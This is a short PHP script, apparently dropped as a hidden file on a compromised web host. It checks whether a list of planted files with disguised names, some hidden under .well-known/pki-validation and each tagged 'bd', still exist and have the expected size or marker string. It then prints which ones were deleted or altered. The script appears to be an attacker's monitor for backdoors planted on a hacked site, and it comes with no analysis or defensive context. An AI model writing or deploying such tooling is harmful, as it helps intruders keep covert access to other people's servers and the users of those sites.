File: //dev/shm/.fac
<?php $r = '/home/seatqfzm/public_html/cryptoinstacash.com'; $x = ["/ele.queue.php"=>"bd@@111904000@@1587",
"/ele.queue.php"=>"bd@@111933225@@buffer_cache",
"/.well-known/pki-validation/toolbar.messages.php"=>"bd@@86612827@@query_handler",
"/health.php"=>"bd@@112179574@@restore_state",
"/param.php"=>"bd@@112138696@@1361",
"/param.php"=>"bd@@112321516@@90",
"/.well-known/pki-validation/formselectlang.pages.php"=>"bd@@112326002@@32",
"/health.php"=>"bd@@112139264@@2341"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');